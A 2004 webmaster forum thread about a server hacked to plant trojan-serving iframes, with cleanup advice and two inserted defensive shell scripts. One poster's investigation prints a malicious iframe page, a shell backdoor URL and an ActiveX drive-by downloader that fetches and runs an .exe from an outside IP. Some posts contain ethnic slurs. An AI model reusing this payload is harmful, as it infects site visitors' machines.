Old 08-17-2004, 04:15 PM   #1
Makingcoin
Confirmed User
 
Join Date: Aug 2002
Location: The Ditch
Posts: 8,919
Fucking Hacked Server!!!!!!!!!

What info can you get on this fucknut?

http://www.whois.sc/trytoimprovesecurity.com

Someone hacked my fucking server and put an iframe that installs a trojan on every single html page I have. Years of fucking galleries, sites, everything.

The page is being hosted at trytoimprovesecurity.com

Looks like his host is esthost.com

What can be done in a situation like this?

Thanks
__________________

www.MAKINGCOIN.com

icq. 166-662-831
"Start making large coin!"


Daddy I Get Paid To Be A Whore - Coming Soon
Makingcoin is offline
Old 08-17-2004, 04:18 PM   #2
Babaganoosh
♥♥♥ Likes Hugs ♥♥♥
 
Join Date: Nov 2001
Location: /home
Posts: 15,841
Any idea how he got in? I'd figure that out first and plug the hole. Then you'll probably have to script something up to remove the iframe code recursively. Perl is your friend.
__________________
I like pie.
Babaganoosh is offline
Old 08-17-2004, 04:21 PM   #3
Chris
Too lazy to set a custom title
 
Join Date: May 2003
Location: icq: 71462500 Skype: Jupzchris
Posts: 27,880
depends what you want done and how much cash you want to put up
__________________
[email protected]
Chris is offline
Old 08-17-2004, 04:22 PM   #4
Makingcoin
Confirmed User
 
Join Date: Aug 2002
Location: The Ditch
Posts: 8,919
Quote:
Originally posted by Armed & Hammered
Any idea how he got in? I'd figure that out first and plug the hole. Then you'll probably have to script something up to remove the iframe code recursively. Perl is your friend.
Not sure exactly how he got in. Host is working on it and writing a script up to change that shit. Just want to know what can be done to this guy.
Makingcoin is offline
Old 08-17-2004, 04:24 PM   #5
Babaganoosh
♥♥♥ Likes Hugs ♥♥♥
 
Join Date: Nov 2001
Location: /home
Posts: 15,841
Quote:
Originally posted by Makingcoin
Not sure exactly how he got in. Host is working on it and writing a script up to change that shit. Just want to know what can be done to this guy.
I think I have a script here somewhere that will help you. I had to write one to change the counter code on a couple thousand pages when a certain counter started autoinstalling shit.
Babaganoosh is offline
Old 08-17-2004, 04:25 PM   #6
Makingcoin
Confirmed User
 
Join Date: Aug 2002
Location: The Ditch
Posts: 8,919
Quote:
Originally posted by Armed & Hammered
I think I have a script here somewhere that will help you. I had to write one to change the counter code on a couple thousand pages when a certain counter started autoinstalling shit.
Icqing you now.
Makingcoin is offline
Old 08-17-2004, 04:26 PM   #7
NoCarrier
We need more free porn
 
Join Date: Mar 2002
Location: Montreal
Posts: 16,356
That sucks.. Anyone in mind who doesn't like you?
__________________
NoCarrier is offline
Old 08-17-2004, 04:28 PM   #8
KC
Confirmed User
 
Join Date: Jan 1995
Posts: 2,417
If the box was compromised, then start over with a clean install on a new box. Don't think you can "plug" the hole and everything will be secure again.

Once it's been compromised it's damaged goods.
__________________

Jupiter Hosting, Inc.
Vice President, Business Development
kc (AT) jupiterhosting.com
KC is offline
Old 08-17-2004, 04:29 PM   #9
Dirty F
Too lazy to set a custom title
 
Join Date: Jul 2001
Posts: 59,204
No, it's a Russian dude, how is that possible? Russians and fucking things up?? Wow, that's a new one.

Fuck, honestly, that part of the world should be disconnected from the net. Let them hack each other.
Dirty F is offline
Old 08-17-2004, 04:44 PM   #10
WarChild
Let slip the dogs of war.
 
Join Date: Jan 2003
Location: Bermuda
Posts: 17,263
Host at swiftwill.com instead.
WarChild is offline
Old 08-17-2004, 04:46 PM   #11
wdsguy
Ryde or Die
 
Join Date: Dec 2002
Location: California-Shanghai
Posts: 19,568
Guess your host is not too up to date on security.
wdsguy is offline
Old 08-17-2004, 04:47 PM   #12
EviLGuY
So Fucking Banned
 
Join Date: Apr 2003
Location: malta
Posts: 12,745
Quote:
Originally posted by Makingcoin
What info can you get on this fucknut?

http://www.whois.sc/trytoimprovesecurity.com

Someone hacked my fucking server and put an iframe that installs a trojan on every single html page I have. Years of fucking galleries, sites, everything.

The page is being hosted at trytoimprovesecurity.com

Looks like his host is esthost.com

What can be done in a situation like this?

Thanks
Not much if he's a Russian cocksucker. Suck it up and hire someone to lock down your box(es).
EviLGuY is offline
Old 08-17-2004, 04:52 PM   #13
Phoenix
BACON BACON BACON
 
Industry Role:
Join Date: Nov 2002
Location: Poems everybody, the laddie fancies himself a poet
Posts: 35,457
I hope your host will compensate you

free month...or two....
__________________
Skype Phoenixskype1
Telegram PhoenixBrad
https://quantads.io
Phoenix is offline
Old 08-17-2004, 04:52 PM   #14
Vitasoy
GFY HALL OF FAME DAMMIT!!!
 
Join Date: Oct 2003
Posts: 58,202
Damn that certainly sucks. Sorry to hear.
__________________


[email protected]
Vitasoy is offline
Old 08-17-2004, 04:53 PM   #15
tootie
Confirmed User
 
Join Date: Jun 2003
Location: Planet Earp
Posts: 6,041
I'll bet someone could make a pretty penny by moving to Russia and "taking care" of these guys that no one can seem to do anything about.
__________________


tootie is offline
Old 08-17-2004, 04:55 PM   #16
Ar3s
So Fucking Banned
 
Join Date: Feb 2004
Location: ICQ : 207880728
Posts: 4,307
sorry to hear mate
hope you will fix things up..
let us know..good LUCK!
Ar3s is offline
Old 08-17-2004, 04:55 PM   #17
QuaWee
Confirmed User
 
Join Date: Jul 2004
Location: boogers
Posts: 5,791
who's your host?
__________________
i luv mainstream
QuaWee is offline
Old 08-17-2004, 05:01 PM   #18
WarChild
Let slip the dogs of war.
 
Join Date: Jan 2003
Location: Bermuda
Posts: 17,263
Quote:
Originally posted by tootie
I'll bet someone could make a pretty penny by moving to Russia and "taking care" of these guys that no one can seem to do anything about.
And since storming in to a country to take on a part of (albeit a very, very small part) the local population is always a good idea.

Once they're done there, the same person could pop in to Afghanistan and grab Bin Laden too. That's a quick what, $25 mil?
WarChild is offline
Old 08-17-2004, 05:40 PM   #19
Fabien
Confirmed User
 
Join Date: Jul 2003
Posts: 4,787
Quote:
Originally posted by NoCarrier
That sucks.. Anyone in mind who doesn't like you?
Ex wife ?
Fabien is offline
Old 08-17-2004, 05:57 PM   #20
fris
Too lazy to set a custom title
 
Join Date: Aug 2002
Posts: 55,319
Quote:
Originally posted by Makingcoin
What info can you get on this fucknut?

http://www.whois.sc/trytoimprovesecurity.com

Someone hacked my fucking server and put an iframe that installs a trojan on every single html page I have. Years of fucking galleries, sites, everything.

The page is being hosted at trytoimprovesecurity.com

Looks like his host is esthost.com

What can be done in a situation like this?

Thanks
Well, first off, if you would have secured your server before you put it online, then your data wouldn't have been insecure in the first place. I can guarantee you if I did a security audit on 100 machines of people on GFY, 85 would be insecure. No wonder all these sponsors are getting hacked. The first thing you do when you buy a server is secure it. I never put any of my clients' servers online until everything is locked up tight.
__________________
Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.


WP Stuff
fris is offline
Old 08-17-2004, 05:58 PM   #21
fris
Too lazy to set a custom title
 
Join Date: Aug 2002
Posts: 55,319
Quote:
Originally posted by Phoenix
I hope your host will compensate you

free month...or two....

Host is not responsible; if it's a server, it's up to the client. It's his loss.
fris is offline
Old 08-17-2004, 06:49 PM   #22
TwinTone
Confirmed User
 
Join Date: Jun 2003
Posts: 220
Quote:
Originally posted by Phoenix
I hope your host will compensate you

free month...or two....
Certainly not the fault of the host, especially if it's a non-managed server. Most of the reseller hosts wouldn't know how to secure a machine anyway.

New holes and buffer overflows come out all the time. We as a host try to alert customers of such things, and help them patch them. But unless you are paying a little more for a managed machine, or someone to take care of it, it's just a matter of time until someone gets in.

No machine is 100% secure. It's not possible, so you better do all you can to keep it up to date.
TwinTone is offline
Old 08-17-2004, 06:54 PM   #23
JayJay
Confirmed User
 
Join Date: Jun 2002
Posts: 3,739
Ouch! that Sucks
JayJay is offline
Old 08-17-2004, 07:00 PM   #24
Aquarius
Confirmed User
 
Join Date: May 2004
Location: Mom's basement
Posts: 4,754
Fucking Russians
Aquarius is offline
Old 08-17-2004, 07:05 PM   #25
Makingcoin
Confirmed User
 
Join Date: Aug 2002
Location: The Ditch
Posts: 8,919
Quote:
Originally posted by TwinTone
Certainly not the fault of the host, especially if it's a non-managed server. Most of the reseller hosts wouldn't know how to secure a machine anyway.

New holes and buffer overflows come out all the time. We as a host try to alert customers of such things, and help them patch them. But unless you are paying a little more for a managed machine, or someone to take care of it, it's just a matter of time until someone gets in.

No machine is 100% secure. It's not possible, so you better do all you can to keep it up to date.
It is a managed server. The host is taking care of me.
Makingcoin is offline
Old 08-17-2004, 07:08 PM   #26
chaze
Confirmed User
 
Join Date: Aug 2002
Posts: 9,752
You can do a search and replace for the entire home partition, then back everything up before the trojan runs again.

Then get new server, upload, and secure better.
chaze is offline
Old 08-17-2004, 11:43 PM   #27
GagOnMyCock
Registered User
 
Join Date: Aug 2004
Posts: 30
Craig, man, that sucks

get your host to do back ups..
GagOnMyCock is offline
Old 08-17-2004, 11:45 PM   #28
fr8
Confirmed User
 
Join Date: Mar 2003
Posts: 5,074
That's shitty as hell. Hopefully he will get what is coming to him.
__________________
joesmut (a) gmail Dot com
Full Stack Developer
fr8 is offline
Old 08-18-2004, 12:10 AM   #29
VeriSexy
Join The Royal Family
 
Join Date: Apr 2002
Posts: 25,463
Damn that sucks dude, get this guy to secure your box

http://www.rack911.com/security.php

__________________
Looking for a KICK ASS TEEN SPONSOR? Check out ROYAL CASH - THE KING OF TEEN!
Incredible webmaster tools FHGs, Morphing Blog and RSS Feeds, Embedded FLV & WMV Videos
.
With TOP RATIO Sites like


ATMovs.com | iTeenVideo.com |
TeenSexMovs.com | TeenSexMania.com



VeriSexy is offline
Old 08-18-2004, 01:01 AM   #30
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Hola! Sorry to hear of your hacker incidents.

Some things you need to do right now:


nmap your server from another clean box:

Such as: nmap -p 1-65535 yourServersIPhere

This will produce results showing which backdoors, if any port-based ones, are listening for the hacker to return. Look for ports that are not supposed to be running. Ones that really stand out are ones that spell things with numbers, such as 31337, which in hacker world spells elite (yeah, they spell wrong).

Also look for hidden files and processes. When your server is hacked, the intruder runs a rootkit which runs hidden processes on your system which you cannot see, because they replace your normal ps binary with a rooted/hacked ps binary that hides any process they wish to hide.

You can get a linux binary here:
http://www.splitinfinity.com/resources/cp

that you can run on your server.
Right click on that and choose save-as, then put it on the hacked box and type:
chmod 0755 cp
then:
./cp

the results will show you any hidden processes running in your process tables.
It's a nice utility I use constantly to security audit machines here at SplitInfinity.

If your system has socklist installed, also run it: socklist
and study the results as they may point to hidden processes and ports running
as well.

Another great thing is: lsof
You use this to find where the hacker hid the files that are running as hidden processes, because sometimes they can be hard to locate. lsof will show you the source of the programs running and keeping files and ports open in the system. Before you kill any hidden processes, it's always good to run lsof and take a look so you can actually FIND the crap they installed on your box so they can't remotely trigger it again. (Sometimes they install things in the public_html directories, or even startup items that restart their hack kits when you reboot.)

Normally when your server is hacked, they replace all of the following binaries:

ls
lsof
md5sum
dir
ps
top
w
who
dirtree
socklist
ifconfig
/bin/login
sshd
ssh
proftpd
wuftpd
xinetd
inetd

etc. It is imperative that you start by installing a NEW md5sum package and checking ALL your binaries against a known clean system and make sure the md5sums match. Basically the md5sums are like fingerprints, and if the file is at all what it is not supposed to be, those fingerprints won't match what the real file should be.

Example:

md5sum /bin/ls
typing that produces this result:
49da757b7b5ba585836ceb00086b6d98 /bin/ls

now if my /bin/ls was hacked, and a known true md5sum is the one above,
it would show completely different:

117c50271e390ba65561bce063301e7d /bin/ls

now I know that 49da757b7b5ba585836ceb00086b6d98 is the REAL md5sum
so if I get 117c50271e390ba65561bce063301e7d it must have been altered.

Also, using the find command can find files that have been recently modified. This only works if the hacker is sloppy, as they normally replace find as well and alter the dates so you cannot tell they modified anything....

Hidden files....
A simple:
locate ...
locate ".. "
might reveal some hidden directories they planted on your system
however keep in mind that locate was most likely hacked as well.

Anytime your system is compromised, you can replace all the binaries.
It's a good idea to make a backup of your system prior to putting it online so you can simply restore a full set of binaries like /bin or /sbin in one fell swoop.
Once you know the binaries are ok, you can start to clean things up because you have the proper VIEW of your system.

A lot of people get hacked and then think they got the hacker out, but they only think this because of the VIEW the hacker is giving them of their system. They make things look normal when in fact they are far from it. A hacker will sit and watch you and laugh about it the entire time.

If you need anything, security work, etc, feel free to call on us.

SplitInfinity Networks - Web Hosting, Co-location and Dedicated Servers
Managed - or Not. But always secure.

:-)
SplitInfinity is offline
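The md5sum baseline check, the hidden-directory search and the recently-changed-file search that the post above walks through, written out as an added shell example that is not from the thread or from SplitInfinity. It assumes a typical Linux layout for the binaries it watches plus GNU coreutils/findutils; TRUSTED_MD5SUM, build_baseline and the other function names are this example's own.

```shell
#!/bin/sh
# Added example, not code from the thread or from SplitInfinity: the md5sum
# baseline check the post describes, plus the hidden-directory and
# recently-changed-file searches, as shell functions. The binary list is the
# one from the post mapped onto typical Linux paths (an assumption; adjust
# for your distro). Point TRUSTED_MD5SUM at a md5sum copied from a clean box:
# on a rooted machine the one in PATH may itself have been replaced.

: "${TRUSTED_MD5SUM:=md5sum}"
WATCHED_BINARIES="bin/ls bin/ps bin/login bin/dir sbin/ifconfig usr/bin/top \
usr/bin/w usr/bin/who usr/bin/md5sum usr/bin/lsof usr/bin/ssh usr/sbin/sshd \
usr/sbin/proftpd usr/sbin/xinetd usr/sbin/inetd"

# build_baseline ROOT MANIFEST: checksum every watched binary that exists
# under ROOT into MANIFEST ("hash  path" lines). Do this on the clean install,
# before the box goes on-net, and keep MANIFEST off the box.
build_baseline() {
    root=$1; manifest=$2
    : > "$manifest"
    for rel in $WATCHED_BINARIES; do
        if [ -f "$root/$rel" ]; then
            "$TRUSTED_MD5SUM" "$root/$rel" >> "$manifest"
        fi
    done
    return 0
}

# verify_baseline MANIFEST: print "MODIFIED path" or "MISSING path" for each
# binary whose fingerprint no longer matches. Returns 1 if anything changed.
verify_baseline() {
    manifest=$1; bad=0
    while read -r expected path; do
        if [ ! -f "$path" ]; then
            echo "MISSING $path"; bad=1
        elif [ "$("$TRUSTED_MD5SUM" "$path" | cut -d' ' -f1)" != "$expected" ]; then
            echo "MODIFIED $path"; bad=1
        fi
    done < "$manifest"
    return $bad
}

# find_suspicious_dirs ROOT: directory names such as "..." or ".. " (with a
# trailing space) that hide among the normal "." and ".." in an ls listing.
find_suspicious_dirs() {
    find "$1" -type d \( -name '..?*' -o -name '. ' \) 2>/dev/null
}

# find_recent ROOT DAYS: files whose inode changed in the last DAYS days.
# ctime is used rather than mtime because touch(1) can fake mtime but not
# ctime; a rootkit that also replaced find(1) defeats this, as the post warns.
find_recent() {
    find "$1" -type f -ctime "-$2" 2>/dev/null
}

# demo_detects_tampering: constructed self-check with fake "binaries" in a
# temp dir (nothing on the real system is touched). Returns 0 only if the
# replaced ps and the planted ".. " directory are both reported.
demo_detects_tampering() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/bin"
    printf 'pretend this is the real ls\n' > "$d/bin/ls"
    printf 'pretend this is the real ps\n' > "$d/bin/ps"
    build_baseline "$d" "$d/baseline.md5"
    verify_baseline "$d/baseline.md5" > /dev/null || { rm -rf "$d"; return 1; }
    printf 'trojaned ps that hides processes\n' > "$d/bin/ps"   # the rootkit swap
    mkdir "$d/.. "
    report=$(verify_baseline "$d/baseline.md5") && { rm -rf "$d"; return 1; }
    hidden=$(find_suspicious_dirs "$d")
    rm -rf "$d"
    [ "$report" = "MODIFIED $d/bin/ps" ] && [ "$hidden" = "$d/.. " ]
}

# Real use: build_baseline / baseline.md5 on the clean box, and later
#   TRUSTED_MD5SUM=/mnt/cdrom/md5sum verify_baseline baseline.md5
if [ "${1:-}" = "demo" ]; then
    demo_detects_tampering && echo "tampering detected as expected"
fi
```

Run it with the argument demo to see the constructed self-check; a non-zero return from verify_baseline is the signal to stop trusting the box's own view of itself.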
Old 08-18-2004, 01:06 AM   #31
Lace
Too lazy to set a custom title
 
Join Date: Mar 2004
Posts: 16,116
Sorry, didn't know this would cause such a problem.
I won't root any more of your servers tonight.
__________________
Your Paysite Partner
Strength In Numbers!
StickyDollars | RadicalCash | KennysPennies | HomegrownCash
Lace is offline
Old 08-18-2004, 01:08 AM   #32
Triple 6
Confirmed User
 
Join Date: Feb 2002
Location: Location: Location: Location: Location: Location: Location: Location: Location: Location: Location: Location: Location: Location: Location: Location: Location: Location: Location: Location: Location: Location: isN'T everything
Posts: 5,394
Damn, sorry to hear about that.
__________________
SIG TOO SMALL! Maximum 1200x600 button and no more than 30 text lines of ALL SIZES and COLORS. Unless your sig is for a GFY top banner sponsor, then you may use a 6240x4800 instead of a 1024x800.
Triple 6 is offline
Old 08-18-2004, 01:17 AM   #33
More Booze
Confirmed User
 
Join Date: Mar 2004
Posts: 5,116
Sorry to hear about that, my server was also hacked a couple of months ago. I was lucky because they didn't touch anything.

But I lost 3 years of galleries, free sites and everything within my work folder last night. I was trying to install Fedora and something got fucked up.

I'm trying to recover it now; GetDataBack didn't do the job.
More Booze is offline
Old 08-18-2004, 01:33 AM   #34
Preacher
Confirmed User
 
Join Date: Feb 2003
Posts: 2,970
that fucking sucks.. sorry to hear that...
Preacher is offline
Old 08-18-2004, 01:53 AM   #35
fuzebox
making it rain
 
Join Date: Oct 2003
Location: seattle
Posts: 22,038


Was this a managed server?
fuzebox is offline
Old 08-18-2004, 02:02 AM   #36
Makingcoin
Confirmed User
 
Join Date: Aug 2002
Location: The Ditch
Posts: 8,919
Quote:
Originally posted by fuzebox


Was this a managed server?
Yes.
Makingcoin is offline
Old 08-18-2004, 02:08 AM   #37
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Ya know, since you are in the process of fixing everything.....

Why not move to a clean box over here that was secured before it went on-net?

I have a box ready for you right now......

ICQ: 64791506
AIM: NJesterIII
Email: [email protected]
SplitInfinity is offline
Old 08-18-2004, 02:19 AM   #38
fuzebox
making it rain
 
Join Date: Oct 2003
Location: seattle
Posts: 22,038
Quote:
Originally posted by Makingcoin
Yes.
I would never trust one ;)
fuzebox is offline
Old 08-18-2004, 02:21 AM   #39
PowerCum
CjOverkill
 
Join Date: Apr 2003
Location: Woldwide
Posts: 1,328
First of all... CHANGE HOSTING COMPANY. If you want some secure box quotes, ICQ me 171216535.
Second, while you are still on that hacked server, take a look at the Apache config... he probably installed mod_layout and is just putting a layout on your pages. If not, then use sed to change all the HTML files in bulk. There is no need for a complex script... sed can do the work.
__________________
CjOverkill Traffic Trading Script
Free, secure and fast traffic trading script. Get your copy now
PowerCum is offline
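The find + sed bulk cleanup PowerCum describes, written out as an added shell example that is not from the thread or from any poster. It assumes GNU sed (for case-insensitive substitution); the host names are the ones quoted in the page source later in this thread, and BAD_HOSTS, count_injected, clean_file and clean_tree are names of this example.

```shell
#!/bin/sh
# Added example, not code from the thread or any poster: the find + sed bulk
# cleanup PowerCum suggests, as shell functions that count, strip and keep
# evidence of the injected 1x1 iframes. Host names come from the page source
# quoted later in the thread; anything else here is constructed.
# Assumes GNU sed (the I flag for case-insensitive substitution).

: "${BAD_HOSTS:=TryToImproveSecurity.com x.full-tgp.net 213.159.117.131}"

# ERE alternation of the hosts with literal dots, e.g. a\.com|b\.net
pat=$(printf '%s' "$BAD_HOSTS" | sed -E 's/\./\\./g; s/ +/|/g')

# One injected element: an <iframe ...> naming one of the hosts, up to its
# closing tag. Only single-line tags are matched, which is how these were
# written; a tag split across lines needs a second pass.
iframe_re="<iframe[^>]*(${pat})[^>]*>[[:space:]]*</iframe>"

# count_injected DIR: number of .html/.htm files under DIR still carrying an
# injected iframe. Run it before, after, and again a day later: if the count
# climbs back, the box is still owned and cleaning files is pointless.
count_injected() {
    find "$1" -type f \( -name '*.html' -o -name '*.htm' \) \
        -exec grep -liE "$iframe_re" {} + | wc -l | tr -d ' '
}

# clean_file FILE: strip every injected iframe from FILE in place (same inode,
# so ownership and mode survive) and keep the tampered original as
# FILE.injected. Returns 0 if FILE changed, 1 if it was already clean.
clean_file() {
    f=$1
    sed -E "s#${iframe_re}##gI" "$f" > "$f.tmp" || { rm -f "$f.tmp"; return 1; }
    if cmp -s "$f" "$f.tmp"; then
        rm -f "$f.tmp"; return 1
    fi
    cp -p "$f" "$f.injected"
    cat "$f.tmp" > "$f" && rm -f "$f.tmp"
}

# clean_tree DIR: clean every .html/.htm file under DIR, print how many changed.
clean_tree() {
    find "$1" -type f \( -name '*.html' -o -name '*.htm' \) | while read -r f; do
        clean_file "$f" && echo "$f"
    done | wc -l | tr -d ' '
}

# Usage (on a copy of the web root restored from backup, not the live box):
#   sh strip_iframes.sh /restore/home
if [ -n "${1:-}" ]; then
    echo "files with injected iframes before: $(count_injected "$1")"
    echo "files cleaned:                      $(clean_tree "$1")"
    echo "files with injected iframes after:  $(count_injected "$1")"
fi
```

The .injected copies are what you hand to whoever investigates; diffing one against its cleaned twin shows exactly what was planted.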
Old 08-18-2004, 04:03 AM   #40
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Not sure if you noticed or not, but the Apache server error shows another host/domain name, xpire.info. This is the same, but different info. I wonder if the name is real or the phone numbers on this one. Doubtful, but maybe he slipped up?


SplitInfinity is offline
Old 08-18-2004, 04:05 AM   #41
Drama Bot V.1
Confirmed User
 
Join Date: Jul 2004
Posts: 200
I clicked your site yesterday and got viruses, spyware and shit on my computer! Spent all last night deleting that shit! Thanks a lot....
Drama Bot V.1 is offline
Old 08-18-2004, 04:07 AM   #42
fris
Too lazy to set a custom title
 
Join Date: Aug 2002
Posts: 55,319
If it's managed, the security is all their fault. They have no idea what is going on. They are clueless.
fris is offline
Old 08-18-2004, 04:19 AM   #43
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Learning more about this hacker....

xpire.info = a rooted server of someone else's.... I found a backdoor he installed:


Http://xpire.info/s/2
http://xpire.info/s/2?=$REQUEST_URI;?

Take a peek. That allows him to run shell commands.

Trying to locate him, I found his thing hidden atop this site:
http://www.allo-webmaster.com/heberg...xpire.info/s/2
Look at the small print on the top...

Might wanna see if he owns that site or if the owner of the site can explain why that link is on the top? Perhaps he is compromised as well? Perhaps this IS him?

Interesting HTML:

<title>Http://xpire.info/s/2 : recherche sur Http://xpire.info/s/2</title><meta name="description" content="Http://xpire.info/s/2 ">
<meta name="keywords" content="Http://xpire.info/s/2">
<meta name="revisit-after" content="15 days">
<meta name="robots" content="index,follow">
<meta NAME="Language" CONTENT="fr">
<meta name="rating" content="General">
<meta name="resource-type" content="document">
<meta name="distribution" content="Global">
<meta name="copyright" content="Copyright (C), 2004, Allo webmaster , Http://xpire.info/s/2 ">
<meta name="author" CONTENT="Zaki">
<meta NAME="Language" CONTENT="fr">
<meta NAME="Identifier-URL" CONTENT="http://www.allo-webmaster.com">
<meta NAME="Reply-to" CONTENT="[email protected]">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="http://www.allo-webmaster.com/style.css" rel="stylesheet" type="text/css">
SplitInfinity is offline
Old 08-18-2004, 04:27 AM   #44
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Here is another domain he owns/owned:

SplitInfinity is offline
Old 08-18-2004, 04:29 AM   #45
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Seems that server (the xpire.info one) is running a proxy server:

Interesting ports on 202.99.23.162:
(The 1653 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
80/tcp open http
8080/tcp closed http-proxy
SplitInfinity is offline
Old 08-18-2004, 04:31 AM   #46
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
This is the root site on the server:

http://202.99.23.162/


Not sure what language it is, but that is who the main owner of the server seems to be.
SplitInfinity is offline
Old 08-18-2004, 04:35 AM   #47
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
He seems to center around xpire.com and b00gle.com:


http://qkacdesign.uw.hu/chcounter/st...rs_days_stats=
SplitInfinity is offline
Old 08-18-2004, 04:37 AM   #48
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Kinda sloppy, I'm finding lots about him:

Http://xpire.info/s/search.php?q=Http://


:-)
SplitInfinity is offline
Old 08-18-2004, 04:58 AM   #49
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Seems he is busy at work; that link does not work anymore, however this one began to:

http://www.xpire.info/fa/tool.html

This is what the source of that page looks like:

Code:
<html>
<head>
</head>
<body bgcolor="Black">
<iframe src="http://TryToImproveSecurity.com/fa/t3.htm" width=1 height=1></iframe>
<!--<iframe src="http://TryToImproveSecurity.com/fa/test.html" width=1 height=1></iframe>//-->
<iframe src="http://TryToImproveSecurity.com/fa/x.htm" width=1 height=1></iframe>
<iframe src="http://TryToImproveSecurity.com/fa/proc.htm" width=1 height=1></iframe>
<iframe src="http://www.TryToImproveSecurity.com/fa/runevil.htm" width=1 height=1></iframe>
<IFRAME SRC="http://x.full-tgp.net/?fox.com" WIDTH=1 HEIGHT=1></IFRAME>
<iframe src="http://213.159.117.131/dl/fox.php" width=1 height=1></iframe>
</body>
</html>
SplitInfinity is offline
Old 08-18-2004, 05:06 AM   #50
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Surely this guy is doing some bad shit:
Notice the telnet calls?







Code:
var downloadurl="http://213.159.117.133/dl/loadadv65.exe";

if(navigator.appVersion.hahahahahahaha("Windows NT 5.1")!=-1) savetopath="C:\\WINDOWS\\system32\\telnet.exe";
if(navigator.appVersion.hahahahahahaha("Windows NT 5.0")!=-1) savetopath="C:\\WINNT\\system32\\telnet.exe";

payloadURL = downloadurl;
var x = new ActiveXObject("Microsoft.XMLHTTP");
xhahahahahaha("GET",payloadURL,0);
x.Send();

function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t" + "r" + "e" + "a" + "m"; }

var s = new ActiveXObject(bla());
s.Mode = 3;
s.Type = 1;
shahahahahaha();
s.Write(x.responseBody);
s.SaveToFile(savetopath,2);

location.href = "telnet://";
SplitInfinity is offline